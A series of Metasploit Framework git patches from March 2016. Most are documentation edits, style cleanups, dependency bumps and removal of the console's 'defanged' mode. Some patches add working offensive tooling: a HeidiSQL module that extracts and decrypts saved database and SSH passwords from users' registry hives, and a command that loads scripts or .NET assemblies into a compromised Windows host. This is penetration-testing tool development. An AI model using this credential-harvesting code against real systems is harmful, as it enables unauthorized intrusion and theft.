read more. +A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to read more. To use the stageless payload, use ```windows/meterpreter_reverse_tcp``` instead. **Meterpreter Timeout Control** -The timeout control basically defines the life span of Meterpreter. To configure, use the +The timeout control basically defines the life span of Meterpreter. To configure it, use the ```set_timeouts``` command: ``` @@ -663,19 +652,17 @@ Retry Total Time: 3600 seconds Retry Wait Time : 10 seconds ``` -To learn more about timeout control, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control). +To learn more about timeout control, please [go here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control). **Meterpreter Transport Control** -Transport Control allows you manage transports on the fly while the payload session is still -running. Meterpreter can automatically cycle through the transports when communication fails, -or you can do so manually. +Transport Control allows you manage transports on the fly while the payload session is still running. Meterpreter can automatically cycle through the transports when communication fails, or you can do it manually. To learn more about this, please read this [documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control). ## Using the Post Exploitation API in IRB -To enter IRB, at the Meterpreter prompt, do like the following: +To enter IRB, do the following at the Meterpreter prompt: ``` meterpreter > irb @@ -687,15 +674,13 @@ meterpreter > irb **The client object** -The client object in Meterpreter's IRB allows you control, or retrieve information about the host. -For example, this demonstrates how to obtain the current privilege we're running the payload as: +The client object in Meterpreter's IRB allows you control or retrieve information about the host. For example, this demonstrates how to obtain the current privilege we're running the payload as: ```ruby >> client.sys.config.getuid ``` -To explore the client object, there are a few tricks. For example, you can use the #inspect method -to inspect it: +To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it: ``` >> client.inspect @@ -707,21 +692,18 @@ You can use the #methods method to see what methods you can use: >> client.methods ``` -To find the source of the method, you can use the #source_location method. For example, say I want -to find the source code for the #getuid method: +To find the source of the method, you can use the #source_location method. For example, say I want to find the source code for the #getuid method: ``` >> client.sys.config.method(:getuid).source_location => ["/Users/user/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32] ``` -The first element of the array is the location of the file. The second element is the line number -of the method. +The first element of the array is the location of the file. The second element is the line number of the method. **Using Railgun** -Railgun allows you to use the remote machine's Windows API in Ruby. For example, to create a -MessageBox on the target machine, do: +Railgun allows you to use the remote machine's Windows API in Ruby. For example, to create a MessageBox on the target machine, do: ``` >> client.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK") diff --git a/documentation/modules/post/windows/gather/hashdump.md b/documentation/modules/post/windows/gather/hashdump.md index 23da64bea1..7e284e76fa 100644 --- a/documentation/modules/post/windows/gather/hashdump.md +++ b/documentation/modules/post/windows/gather/hashdump.md @@ -1,6 +1,6 @@ The post/gather/hashdump module functions similarly to Meterpreter's built-in hashdump command. -Having this feature as a post module allows it to be used in different penetration testing -scenarios. + +Having this feature as a post module allows it to be used in different penetration testing scenarios. ## Vulnerable Application @@ -10,8 +10,8 @@ scenarios. To be able to use post/gather/hash_dump, you must meet these requirements: * You are on a Meterpreter type session. -* Target is a Windows platform. -* Execute it under the context of a high privilege account, such as SYSTEM. +* The target is a Windows platform. +* It must be executed under the context of a high privilege account, such as SYSTEM. ## Verification Steps @@ -25,8 +25,7 @@ Please see Overview for usage. **Upgrading to Meterpreter** -To be able to use this module, a Meterpreter session is needed. To upgrade to this, the easiest -way is to use the post/multi/manage/shell_to_meterpreter module. Or, you can try: +To be able to use this module, a Meterpreter session is needed. To upgrade to a Meterpreter session, the easiest way is to use the post/multi/manage/shell_to_meterpreter module. Or, you can try: 1. Use the exploit/multi/script/web_delivery module. 2. Manually generate a Meterpreter executable, upload it, and execute it. @@ -34,6 +33,7 @@ way is to use the post/multi/manage/shell_to_meterpreter module. Or, you can try **High Privilege Account** Before using post/gather/hashdump, there is a possibility you need to escalate your privileges. + There are a few common options to consider: * Using a local exploit module. Or use Local Exploit Suggester, which automatically informs you @@ -43,5 +43,4 @@ There are a few common options to consider: **Hashdump From Multiple Sessions** -One major advantage of having hashdump as a post module is you can run against multiple hosts -easily. To learn how, refer to Overview for usage. +One major advantage of having hashdump as a post module is you can run against it multiple hosts easily. To learn how, refer to Overview for usage. From 0073a8f40e85e0328945668fe874428f74870845 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 24 Mar 2016 15:20:43 -0500 Subject: [PATCH 611/686] Wrap comments at 78, style --- .../net/socket_subsystem/udp_channel.rb | 21 ++++++++++--------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb index c9f3511624..62c03b58aa 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb @@ -20,20 +20,21 @@ class UdpChannel < Rex::Post::Meterpreter::Datagram # # We are a datagram channel. # - class << self - def cls - return CHANNEL_CLASS_DATAGRAM - end + def self.cls + CHANNEL_CLASS_DATAGRAM end # - # Open a new UDP channel on the remote end. The local host/port are optional, if none are specified - # the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also - # optional, if specified all default send(), write() call will sendto the specified peer. If no peer - # host/port is specified you must use sendto() and specify the remote peer you wish to send to. This - # effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease. + # Open a new UDP channel on the remote end. The local host/port are + # optional, if none are specified the remote end will bind to INADDR_ANY + # with a random port number. The peer host/port are also optional, if + # specified all default send(), write() call will sendto the specified peer. + # If no peer host/port is specified you must use sendto() and specify the + # remote peer you wish to send to. This effectivly lets us create + # bound/unbound and connected/unconnected UDP sockets with ease. # - def UdpChannel.open(client, params) + # @return [Channel] + def self.open(client, params) c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS, [ { From dfa518b492fa4b6c6550456012bb61df47a9d83e Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 24 Mar 2016 15:21:03 -0500 Subject: [PATCH 612/686] Whitespace --- lib/rex/post/meterpreter/channels/datagram.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/channels/datagram.rb b/lib/rex/post/meterpreter/channels/datagram.rb index 16498d1092..fc8c2e3323 100644 --- a/lib/rex/post/meterpreter/channels/datagram.rb +++ b/lib/rex/post/meterpreter/channels/datagram.rb @@ -37,12 +37,12 @@ class Datagram < Rex::Post::Meterpreter::Channel return [super(length, flags)[0], super(length, flags)[0]] end - def send( buf, flags, saddr ) - channel.send( buf, flags, saddr) + def send(buf, flags, saddr) + channel.send(buf, flags, saddr) end end - def dio_write_handler( packet, data ) + def dio_write_handler(packet, data) @recvd ||= [] @recvd << [packet, data] peerhost = packet.get_tlv_value( From 925cc3b56fe7855edf6af79d535211b39fb24ec3 Mon Sep 17 00:00:00 2001 From: tdoan-r7 Date: Thu, 24 Mar 2016 16:51:02 -0500 Subject: [PATCH 613/686] Adding docs for Lester https://issues.corp.rapid7.com/browse/MS-1193 --- .../multi/recon/local_exploit_suggester.md | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 documentation/modules/post/multi/recon/local_exploit_suggester.md diff --git a/documentation/modules/post/multi/recon/local_exploit_suggester.md b/documentation/modules/post/multi/recon/local_exploit_suggester.md new file mode 100644 index 0000000000..89d54765bb --- /dev/null +++ b/documentation/modules/post/multi/recon/local_exploit_suggester.md @@ -0,0 +1,31 @@ +The Local Exploit Suggester is a post-exploitation module that you can use to check a system for local vulnerabilities. It performs local exploit checks; it does not actually run any exploits, which is useful because this means you to scan a system without being intrusive. In addition to being stealthy, it's a time saver. You don't have to manually search for local exploits that will work; it'll show you which exploits the target is vulnerable to based on the system's platform and architecture. + +The Local Exploit Suggester is available for Python, PHP, and Windows Meterpreter. + + +## Vulnerable Application + +To use the Local Exploit Suggester: + +* You must have an open Meterpreter session. + +## Verification Steps + +Please see the Overview section. + +##Options + +You can set the following options for the Local Exploit Suggester: + +* **showdescription** - Set this option to true to see more details about each exploit. + + +## Scenarios + +When the Local Exploit Suggester runs, it displays a list of local exploits that the target may be vulnerable to, and it tells you the likelihood of exploitation. + +The following terms are used to help you understand how vulnerable a target is to a particular exploit: + +* **Vulnerable** - Indicates that the target is vulnerable. +* **Appears** - Indicates that the target may be vulnerable based on the file version, but the vulnerable code has not been tested. +* **Detected** - Indicates that the target has the file, but it cannot be determined whether or not the target is vulnerable. \ No newline at end of file From 76c6f8c19d34d351e8e5c3bad19604e2682d498f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 24 Mar 2016 17:07:19 -0500 Subject: [PATCH 614/686] Move module_doc_template --- .../markdown_doc => documentation/modules}/module_doc_template.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {data/markdown_doc => documentation/modules}/module_doc_template.md (100%) diff --git a/data/markdown_doc/module_doc_template.md b/documentation/modules/module_doc_template.md similarity index 100% rename from data/markdown_doc/module_doc_template.md rename to documentation/modules/module_doc_template.md From c3ce621d04af842cae2788a3cc5bbf717369e254 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 24 Mar 2016 20:43:51 -0500 Subject: [PATCH 615/686] Fix gemfile --- Gemfile.lock | 2 ++ metasploit-framework.gemspec | 3 +++ 2 files changed, 5 insertions(+) diff --git a/Gemfile.lock b/Gemfile.lock index 9806aeabf7..530c7a527d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -18,6 +18,7 @@ PATH msgpack network_interface (~> 0.0.1) nokogiri + octokit openssl-ccm (= 1.2.1) packetfu (= 1.1.11) pcaprub @@ -25,6 +26,7 @@ PATH railties rb-readline-r7 recog (= 2.0.14) + redcarpet robots rubyzip (~> 1.1) sqlite3 diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 80df353f99..da41ef64cc 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -89,6 +89,9 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'recog', '2.0.14' # required for bitlocker fvek extraction spec.add_runtime_dependency 'openssl-ccm', '1.2.1' + # Needed for documentation generation + spec.add_runtime_dependency 'octokit' + spec.add_runtime_dependency 'redcarpet' # rb-readline doesn't work with Ruby Installer due to error with Fiddle: # NoMethodError undefined method `dlopen' for Fiddle:Module From c4735bd72a391d8b7be7b1b99d335a00cf9530c0 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 24 Mar 2016 20:56:46 -0500 Subject: [PATCH 616/686] Fix rspec pull_request_finder_spec.rb --- spec/lib/msf/util/document_generator/pull_request_finder_spec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb index 7c224831b6..edd19163b8 100644 --- a/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb +++ b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb @@ -58,6 +58,7 @@ RSpec.describe Msf::Util::DocumentGenerator::PullRequestFinder do end before(:each) do + allow(ENV).to receive(:has_key?).and_return(true) allow_any_instance_of(Net::HTTP).to receive(:request).with(any_args).and_return(http_response) end From ce8a6f57a004987d21c1bd672e362304dd440f16 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 25 Mar 2016 12:17:03 +1000 Subject: [PATCH 617/686] Added powershell_import support --- .../extensions/powershell/powershell.rb | 24 ++++++++++ .../meterpreter/extensions/powershell/tlv.rb | 2 + .../console/command_dispatcher/powershell.rb | 44 +++++++++++++++++++ 3 files changed, 70 insertions(+) diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb index d1211508d1..d4949d465c 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -31,6 +31,30 @@ class Powershell < Extension end + def import_file(opts={}) + return nil unless opts[:file] + + # if it's a script, then we'll just use execute_string + if opts[:file].end_with?('.ps1') + opts[:code] = ::File.read(opts[:file]) + return execute_string(opts) + end + + # if it's a dll (hopefully a .NET 2.0 one) then do something different + if opts[:file].end_with?('.dll') + # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly? + binary = ::File.read(opts[:file]) + + request = Packet.create_request('powershell_assembly_load') + request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length) + request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary) + client.send_request(request) + return true + end + + return false + end + def execute_string(opts={}) return nil unless opts[:code] diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb index 99612bed91..edb69d3c68 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -8,6 +8,8 @@ module Powershell TLV_TYPE_POWERSHELL_SESSIONID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) +TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 4) +TLV_TYPE_POWERSHELL_ASSEMBLY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 5) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb index 485799f5f6..7069217692 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -29,6 +29,7 @@ class Console::CommandDispatcher::Powershell # def commands { + 'powershell_import' => 'Import a PS1 script or .NET Assembly DLL', 'powershell_shell' => 'Create an interactive Powershell prompt', 'powershell_execute' => 'Execute a Powershell command string' } @@ -68,6 +69,49 @@ class Console::CommandDispatcher::Powershell shell.interact_with_channel(channel) end + @@powershell_import_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_import_usage + print_line('Usage: powershell_import [-s session-id]') + print_line + print_line('Imports a powershell script or assembly into the target.') + print_line('The file must end in ".ps1" or ".dll".') + print_line('Powershell scripts can be loaded into any session (via -s).') + print_line('.NET assemblies are applied to all sessions.') + print_line(@@powershell_import_opts.usage) + end + + # + # Import a script or assembly component into the target. + # + def cmd_powershell_import(*args) + if args.length == 0 || args.include?('-h') + powershell_import_usage + return false + end + + opts = { + file: args.shift + } + + @@powershell_import_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + result = client.powershell.import_file(opts) + if !result.blank? && result != false + print_good("File successfully imported. Result:\n#{result}") + else + print_error("File failed to load.") + end + end + @@powershell_execute_opts = Rex::Parser::Arguments.new( '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], '-h' => [false, 'Help banner'] From 1fe40d9f2d323fa53b048192dc068d16dd599c94 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 24 Mar 2016 22:32:55 -0500 Subject: [PATCH 618/686] update to metasploit-payloads 1.1.4 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 4daa391b99..97884d8956 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) - metasploit-payloads (= 1.1.3) + metasploit-payloads (= 1.1.4) metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.3) + metasploit-payloads (1.1.4) metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 80df353f99..d6dd3d1b57 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.3' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.4' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 72bde633979676fbd7dbf2440c023dd9bc0b1cec Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 25 Mar 2016 13:03:35 -0700 Subject: [PATCH 619/686] Bump version of framework to 4.11.19 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 97884d8956..d0ba0c7661 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.18) + metasploit-framework (4.11.19) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ec28016010..caea85e2fe 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.18" + VERSION = "4.11.19" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 976932ed43387909e5a31deaf455a76b9427b947 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?= Date: Sat, 26 Mar 2016 12:00:25 +0100 Subject: [PATCH 620/686] Initial commit --- .../windows/gather/credentials/heidisql.rb | 165 ++++++++++++++++++ 1 file changed, 165 insertions(+) create mode 100644 modules/post/windows/gather/credentials/heidisql.rb diff --git a/modules/post/windows/gather/credentials/heidisql.rb b/modules/post/windows/gather/credentials/heidisql.rb new file mode 100644 index 0000000000..133b3d4dd5 --- /dev/null +++ b/modules/post/windows/gather/credentials/heidisql.rb @@ -0,0 +1,165 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::Windows::Registry + include Msf::Auxiliary::Report + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Gather HeidiSQL Saved Password Extraction', + 'Description' => %q{ + This module extracts saved passwords from the HeidiSQL client. These + passwords are stored in the registry. They are encrypted with a custom algorithm. + This module extracts and decrypts these passwords. + }, + 'License' => MSF_LICENSE, + 'Author' => ['h0ng10'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def run + userhives=load_missing_hives() + userhives.each do |hive| + next if hive['HKU'] == nil + print_status("Looking at Key #{hive['HKU']}") + begin + subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers") + if subkeys.nil? or subkeys.empty? + print_status ("HeidiSQL not installed for this user.") + next + end + + service_types = { 0 => 'mysql', + 1 => 'mysql-named-pipe', + 2 => 'mysql-ssh', + 3 => 'mssql-named-pipe', + 4 => 'mssql', + 5 => 'mssql-spx-ipx', + 6 => 'mssql-banyan-vines', + 7 => 'mssql-windows-rpc', + 8 => 'postgres'} + + subkeys.each do |site| + site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}" + host = registry_getvaldata(site_key, "Host") || "" + user = registry_getvaldata(site_key, "User") || "" + port = registry_getvaldata(site_key, "Port") || "" + db_type = registry_getvaldata(site_key, "NetType") || "" + prompt = registry_getvaldata(site_key, "LoginPrompt") || "" + ssh_user = registry_getvaldata(site_key, "SSHtunnelUser") || "" + ssh_host = registry_getvaldata(site_key, "SSHtunnelHost") || "" + ssh_port = registry_getvaldata(site_key, "SSHtunnelPort") || "" + ssh_pass = registry_getvaldata(site_key, "SSHtunnelPass") || "" + win_auth = registry_getvaldata(site_key, "WindowsAuth") || "" + epass = registry_getvaldata(site_key, "Password") + + # skip if windows authentication is used (mssql only) + next if db_type.between?(3,7) and win_auth == 1 + next if epass == nil or epass == "" or epass.length == 1 or prompt == 1 + pass = decrypt(epass) + print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user} Password: #{pass}") + + service_data = { + address: host, + port: port, + service_name: service_types[db_type], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: pass, + username: user + } + + credential_data.merge!(service_data) + + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + + + # if we have a MySQL via SSH connection, we need to store the SSH credentials as well + if db_type == 2 then + + print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user} Password: #{ssh_pass}") + + service_data = { + address: ssh_host, + port: ssh_port, + service_name: 'ssh', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: ssh_pass, + username: ssh_user + } + + credential_data.merge!(service_data) + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + + end + end + rescue + print_error("Cannot Access User SID: #{hive['HKU']}") + end + end + unload_our_hives(userhives) + end + + def decrypt(encoded) + decoded = "" + shift = Integer(encoded[-1,1]) + encoded = encoded[0,encoded.length-1] + + hex_chars = encoded.scan(/../) + hex_chars.each do |entry| + x = entry.to_i(16) - shift + decoded += x.chr(Encoding::UTF_8) + end + + return decoded + end +end From f1857d63504c0964d50f25c72a4be9dab58b7be9 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 28 Mar 2016 09:02:07 -0500 Subject: [PATCH 621/686] Kill defanged mode --- external/zsh/_msfconsole | 1 - lib/metasploit/framework/command/console.rb | 1 - .../framework/parsed_options/console.rb | 5 ---- lib/msf/ui/console/command_dispatcher.rb | 6 ---- .../console/command_dispatcher/auxiliary.rb | 2 -- lib/msf/ui/console/command_dispatcher/core.rb | 18 ----------- .../ui/console/command_dispatcher/exploit.rb | 2 -- lib/msf/ui/console/command_dispatcher/post.rb | 2 -- lib/msf/ui/console/driver.rb | 30 ------------------- .../ui/console/module_command_dispatcher.rb | 4 +-- 10 files changed, 1 insertion(+), 70 deletions(-) diff --git a/external/zsh/_msfconsole b/external/zsh/_msfconsole index 1a012fb62c..6cf529e91b 100644 --- a/external/zsh/_msfconsole +++ b/external/zsh/_msfconsole @@ -23,7 +23,6 @@ _arguments \ {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \ "-c[Load the specified configuration file]:configuration file:_files" \ - {-d,--defanged}"[Execute the console as defanged]" \ {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \ {-h,--help}"[Show help text]" \ {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \ diff --git a/lib/metasploit/framework/command/console.rb b/lib/metasploit/framework/command/console.rb index 797d8dcdc0..cc28346152 100644 --- a/lib/metasploit/framework/command/console.rb +++ b/lib/metasploit/framework/command/console.rb @@ -80,7 +80,6 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command:: driver_options['DatabaseMigrationPaths'] = options.database.migrations_paths driver_options['DatabaseYAML'] = options.database.config driver_options['DeferModuleLoads'] = options.modules.defer_loads - driver_options['Defanged'] = options.console.defanged driver_options['DisableBanner'] = options.console.quiet driver_options['DisableDatabase'] = options.database.disable driver_options['LocalOutput'] = options.console.local_output diff --git a/lib/metasploit/framework/parsed_options/console.rb b/lib/metasploit/framework/parsed_options/console.rb index 66052a00d6..0789cf06ae 100644 --- a/lib/metasploit/framework/parsed_options/console.rb +++ b/lib/metasploit/framework/parsed_options/console.rb @@ -10,7 +10,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par options.console.commands = [] options.console.confirm_exit = false - options.console.defanged = false options.console.local_output = nil options.console.plugins = [] options.console.quiet = false @@ -40,10 +39,6 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par options.console.confirm_exit = true end - option_parser.on('-d', '--defanged', 'Execute the console as defanged') do - options.console.defanged = true - end - option_parser.on('-L', '--real-readline', 'Use the system Readline library instead of RbReadline') do options.console.real_readline = true end diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index c8bcd12e52..0d3155c755 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb @@ -60,12 +60,6 @@ module CommandDispatcher def active_session=(mod) driver.active_session = mod end - # - # Checks to see if the driver is defanged. - # - def defanged? - driver.defanged? - end # # Logs an error message to the screen and the log file. The callstack is diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb index b667c6367c..19bf3fb964 100644 --- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb +++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb @@ -72,8 +72,6 @@ class Auxiliary # Executes an auxiliary module # def cmd_run(*args) - defanged? - opt_str = nil action = mod.datastore['ACTION'] jobify = false diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c619956d06..a586a87d2b 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -95,10 +95,6 @@ class Core "-h" => [ false, "Help banner." ], "-e" => [ true, "Expression to evaluate." ]) - # The list of data store elements that cannot be set when in defanged - # mode. - DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] - # Constant for disclosure date formatting in search functions DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" @@ -868,8 +864,6 @@ class Core # Goes into IRB scripting mode # def cmd_irb(*args) - defanged? - expressions = [] # Parse the command options @@ -1218,8 +1212,6 @@ class Core # the framework root plugin directory is used. # def cmd_load(*args) - defanged? - if (args.length == 0) cmd_load_help return false @@ -1476,8 +1468,6 @@ class Core # restarts of the console. # def cmd_save(*args) - defanged? - # Save the console config driver.save_config @@ -1508,8 +1498,6 @@ class Core # Adds one or more search paths. # def cmd_loadpath(*args) - defanged? - if (args.length == 0 or args.include? "-h") cmd_loadpath_help return true @@ -2166,12 +2154,6 @@ class Core @cache_payloads = nil end - # Security check -- make sure the data store element they are setting - # is not prohibited - if global and DefangedProhibitedDataStoreElements.include?(name) - defanged? - end - # If the driver indicates that the value is not valid, bust out. if (driver.on_variable_set(global, name, value) == false) print_error("The value specified for #{name} is not valid.") diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index fac610ed38..7d73935782 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -49,8 +49,6 @@ class Exploit # Launches an exploitation attempt. # def cmd_exploit(*args) - defanged? - opt_str = nil payload = mod.datastore['PAYLOAD'] encoder = mod.datastore['ENCODER'] diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb index 8ea990a66d..7b64a01098 100644 --- a/lib/msf/ui/console/command_dispatcher/post.rb +++ b/lib/msf/ui/console/command_dispatcher/post.rb @@ -78,8 +78,6 @@ class Post # Executes an auxiliary module # def cmd_run(*args) - defanged? - opt_str = nil jobify = false quiet = false diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index e73eb55724..5e2222a168 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -144,14 +144,6 @@ class Driver < Msf::Ui::Driver # Whether or not to confirm before exiting self.confirm_exit = opts['ConfirmExit'] - # Disables "dangerous" functionality of the console - @defanged = opts['Defanged'] - - # If we're defanged, then command passthru should be disabled - if @defanged - self.command_passthru = false - end - # Parse any specified database.yml file if framework.db.usable and not opts['SkipDatabaseInit'] @@ -630,17 +622,6 @@ class Driver < Msf::Ui::Driver # attr_accessor :active_resource - # - # If defanged is true, dangerous functionality, such as exploitation, irb, - # and command shell passthru is disabled. In this case, an exception is - # raised. - # - def defanged? - if @defanged - raise DefangedException - end - end - def stop framework.events.on_ui_stop() super @@ -769,17 +750,6 @@ protected end end -# -# This exception is used to indicate that functionality is disabled due to -# defanged being true -# -class DefangedException < ::Exception - def to_s - "This functionality is currently disabled (defanged mode)" - end -end - - end end end diff --git a/lib/msf/ui/console/module_command_dispatcher.rb 